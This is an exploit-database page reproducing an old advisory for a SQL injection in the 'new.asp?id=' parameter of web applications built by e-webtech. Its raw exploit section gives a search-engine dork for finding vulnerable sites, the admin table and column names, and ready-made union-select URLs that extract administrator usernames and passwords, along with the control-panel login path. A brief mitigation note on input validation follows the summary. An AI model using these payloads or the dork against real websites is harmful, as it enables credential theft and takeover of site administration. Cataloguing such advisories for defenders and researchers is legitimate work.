header-logo
Suggest Exploit
vendor:
Not provided
by:
protocol
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Not provided
Affected Version From: Not provided
Affected Version To: Not provided
Patch Exists: Not provided
Related CWE: Not provided
CPE: Not provided
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Not provided
Not provided

(new.asp?id=) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be used to extract sensitive information from the database, such as usernames and passwords. The attacker can also use the crafted query to modify the database, such as adding or deleting records.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

************************************************************
** (new.asp?id=) SQL Injection Vulnerability
************************************************************
** Home: http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** Risk: high
** Title: (new.asp?id=) SQL Injection Vulnerability
** Dork: "Powerd by www.e-webtech.com"
************************************************************
** Discovred by: protocol
** From : algeria
** Contact : pre@live.fr
** *********************************************************
** Greet to :
** All Members of http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** And My ViRuS_Ra3cH & kondamne & komandos & yasMouh & N2N
************************************************************
** Exploit:
**
** http://localhost.com/new.asp?id=1+union+select+0+from+adminpassword
**
**
** Column: username | password & pw
**
**
** Control Panel: http://localhost.com/controlpanel/login.asp
**
** Example:
**
**
** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
**
**
************************************************************

Navigation

Suggest Exploit

Services By CQR